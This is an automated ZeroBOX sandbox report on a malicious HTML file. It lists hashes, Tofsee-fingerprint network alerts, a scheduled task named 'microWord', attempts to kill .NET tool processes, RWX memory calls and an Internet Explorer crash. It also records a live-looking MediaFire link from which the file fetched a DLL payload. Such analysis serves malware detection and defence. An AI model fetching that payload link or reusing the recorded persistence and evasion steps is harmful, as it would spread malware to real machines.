Summary | ZeroBOX

11.html

Generic Malware Antivirus AntiVM MSOffice File AntiDebug
Category: FILE
Machine: s1_win7_x6402
Started: May 19, 2022, 9:02 a.m.
Completed: May 19, 2022, 9:05 a.m.
Size: 3.8KB
Type: HTML document, ASCII text, with very long lines, with CRLF line terminators
MD5: f48bef3d2bb1295b3a5d1060815ff3e6
SHA256: 197f636c1d4f9772cc838eda5b33e5e1d71f06df9c27acc1daf87feac8db3578
CRC32: 018A5F5C
ssdeep: 96:+PU0aTP8WUNMW718+OMaMFXM5M0GJMdzbgoiz4GWypH5IgkH:mxaY3oi/WItkH
Yara: None matched

IP Address Status Action
104.16.203.237 Active Moloch
117.18.232.200 Active Moloch
164.124.101.2 Active Moloch
199.91.155.14 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.102:49183 -> 199.91.155.14:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.102:49182 -> 104.16.203.237:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.102:49189 -> 117.18.232.200:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 117.18.232.200:443 -> 192.168.56.102:49190 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.102:49184 -> 199.91.155.14:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.102:49188 -> 117.18.232.200:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined

Suricata TLS

Flow: TLSv1 192.168.56.102:49182 -> 104.16.203.237:443
Issuer: C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Organization Validation Secure Server CA
Subject: C=US, ST=Texas, O=MediaFire, OU=IT, CN=*.mediafire.com
Fingerprint: 49:b6:4e:74:94:f0:7e:32:2b:c5:39:18:d0:a5:1e:69:4d:65:8f:b6

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: SUCCESS: The scheduled task "microWord" has successfully been created.
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

buffer: ERROR: The process "aspnet_compiler.exe" not found.
console_handle: 0x000000000000000b
1 1 0

WriteConsoleW

buffer: ERROR: The process "RegAsm.exe" not found.
console_handle: 0x000000000000000b
1 1 0

WriteConsoleW

buffer: ERROR: The process "InstallUtil.exe" not found.
console_handle: 0x000000000000000b
1 1 0

WriteConsoleW

buffer: ERROR: The process "cvtres.exe" not found.
console_handle: 0x000000000000000b
1 1 0

WriteConsoleW

buffer: ERROR: The process "vbc.exe" not found.
console_handle: 0x000000000000000b
1 1 0

WriteConsoleW

buffer: ERROR: The process "msbuild.exe" not found.
console_handle: 0x000000000000000b
1 1 0

WriteConsoleW

buffer: ERROR: The process "csc.exe" not found.
console_handle: 0x000000000000000b
1 1 0

WriteConsoleW

buffer: ERROR: The process "CasPol.exe" not found.
console_handle: 0x000000000000000b
1 1 0

WriteConsoleW

buffer: ERROR: The process "jsc.exe" not found.
console_handle: 0x000000000000000b
1 1 0

WriteConsoleW

buffer: ERROR: The process "RegAsm.exe" not found.
console_handle: 0x000000000000000b
1 1 0

WriteConsoleW

buffer: ERROR: The process "RegSvcs.exe" not found.
console_handle: 0x000000000000000b
1 1 0

WriteConsoleW

buffer: ERROR: The process "aspnet_regiis.exe" not found.
console_handle: 0x000000000000000b
1 1 0

WriteConsoleW

buffer: ERROR: The process "aspnet_regbrowsers.exe" not found.
console_handle: 0x000000000000000b
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000000019e800
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000001ac130
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000001ac130
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000001ac130
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000001bd010
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000001bd010
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000001bd0f0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000001bd0f0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000001bd0f0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000001bd0f0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000001bd470
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000001bd470
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000001bd470
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000001bd390
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000001bd390
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000001bd390
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000001bd320
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000001bd320
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000001bd320
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000001bd320
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000001bd320
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000001bd320
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000001bd320
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000001bd320
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000001bd940
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000001bd940
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000001bd940
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000001bdb00
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000001bdb00
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000001bdb70
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000001bdb70
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000001bdb00
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000001bdb00
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000001bdb00
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000001bde80
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000001bde80
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000001abb10
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000001abb10
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b9df7f0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b9df7f0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001ba64af0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001ba64af0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000001bd6a0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000001bd6a0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000001bd9b0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000001bd9b0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d @ 0x7fefdcfa49d
RpcRaiseException+0x53 RpcExceptionFilter-0x2bd rpcrt4+0x173c3 @ 0x7feff2373c3
ObjectStublessClient32+0x8bf CoDisconnectContext-0x107b9 ole32+0x443bf @ 0x7feff6d43bf
IUnknown_AddRef_Proxy+0x1f5 NdrFixedArrayBufferSize-0xeb rpcrt4+0x35295 @ 0x7feff255295
I_RpcFreeBuffer+0x1b9 NdrRangeUnmarshall-0x5a7 rpcrt4+0x32799 @ 0x7feff252799
Ndr64AsyncServerCallAll+0xa9e Ndr64AsyncClientCall-0xf42 rpcrt4+0xdaf1e @ 0x7feff2faf1e
Ndr64AsyncServerCallAll+0x12ec Ndr64AsyncClientCall-0x6f4 rpcrt4+0xdb76c @ 0x7feff2fb76c
NdrStubCall3+0xc6 NdrOleAllocate-0x3ea rpcrt4+0x348d6 @ 0x7feff2548d6
CoGetInstanceFromFile+0x4cd3 HACCEL_UserFree-0x70fd ole32+0x170883 @ 0x7feff800883
CoGetInstanceFromFile+0x511d HACCEL_UserFree-0x6cb3 ole32+0x170ccd @ 0x7feff800ccd
CoGetInstanceFromFile+0x5093 HACCEL_UserFree-0x6d3d ole32+0x170c43 @ 0x7feff800c43
CoSetState+0x1450 DcomChannelSetHResult-0x34c ole32+0x2a4f0 @ 0x7feff6ba4f0
GetErrorInfo+0x599 ObjectStublessClient7-0xb1f ole32+0x3d551 @ 0x7feff6cd551
CoGetInstanceFromFile+0x78ce HACCEL_UserFree-0x4502 ole32+0x17347e @ 0x7feff80347e
CoGetInstanceFromFile+0x567b HACCEL_UserFree-0x6755 ole32+0x17122b @ 0x7feff80122b
CoGetInstanceFromFile+0x7992 HACCEL_UserFree-0x443e ole32+0x173542 @ 0x7feff803542
GetErrorInfo+0x475 ObjectStublessClient7-0xc43 ole32+0x3d42d @ 0x7feff6cd42d
GetErrorInfo+0x21e ObjectStublessClient7-0xe9a ole32+0x3d1d6 @ 0x7feff6cd1d6
TranslateMessageEx+0x2a1 IntersectRect-0x11f user32+0x19bd1 @ 0x77569bd1
TranslateMessage+0x1ea DispatchMessageW-0x42 user32+0x198da @ 0x775698da
GetErrorInfo+0xf3 ObjectStublessClient7-0xfc5 ole32+0x3d0ab @ 0x7feff6cd0ab
CoUnloadingWOW+0x117 OleCreateFromFileEx-0x1829 ole32+0x163e57 @ 0x7feff7f3e57
ObjectStublessClient24+0x1876 CLSIDFromString-0x57a ole32+0x10106 @ 0x7feff6a0106
ObjectStublessClient24+0x18f2 CLSIDFromString-0x4fe ole32+0x10182 @ 0x7feff6a0182
BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x772e652d
RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x7767c521

exception.instruction_r: 48 81 c4 c8 00 00 00 c3 48 85 f6 74 08 83 3b 00
exception.symbol: RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d
exception.instruction: add rsp, 0xc8
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 42141
exception.address: 0x7fefdcfa49d
registers.r14: 0
registers.r15: 0
registers.rcx: 99410128
registers.rsi: 0
registers.r10: 0
registers.rbx: 0
registers.rsp: 99416080
registers.r11: 99411888
registers.r8: 0
registers.r9: 0
registers.rdx: 1
registers.r12: 0
registers.rbp: 0
registers.rdi: 0
registers.rax: 1922348528
registers.r13: 0
1 0 0
suspicious_features: GET method with no useragent header
suspicious_request: GET https://www.mediafire.com/file/cqbvjh2mo0z6x96/11.dll/file
request GET http://ie9cvlist.ie.microsoft.com/IE9CompatViewList.xml
request GET https://www.mediafire.com/file/cqbvjh2mo0z6x96/11.dll/file
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2220
region_size: 9703424
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000025f0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002f30000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2220
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2220
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2220
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2220
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2220
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2220
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2220
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007756d000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2220
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077592000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2220
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077574000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2220
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077592000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2220
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefc5c5000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2220
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefc5c5000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2220
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefe0c4000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2220
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007feff4a1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2220
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007755a000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2220
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002b70000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2220
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefa7c7000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2220
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef7019000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2220
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3d89000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2312
region_size: 9834496
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002f60000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2312
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000038c0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2312
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2312
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2312
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2312
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2312
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2312
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2312
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007756d000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2312
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077592000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2312
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077574000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2312
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077592000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2312
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefc5c5000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2312
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefc5c5000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2312
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefe0c4000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2312
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007feff4a1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2312
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007755a000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2312
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007755f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2312
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007755d000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2312
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007755b000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2312
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000772e6000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2312
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077696000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2312
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000772e1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2312
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077560000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2312
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007755a000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2312
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007766f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2312
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007767b000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2312
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007feff7e7000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2312
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefe064000
process_handle: 0xffffffffffffffff
1 0 0
Application Crash Process iexplore.exe with pid 2220 crashed
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d @ 0x7fefdcfa49d
RpcRaiseException+0x53 RpcExceptionFilter-0x2bd rpcrt4+0x173c3 @ 0x7feff2373c3
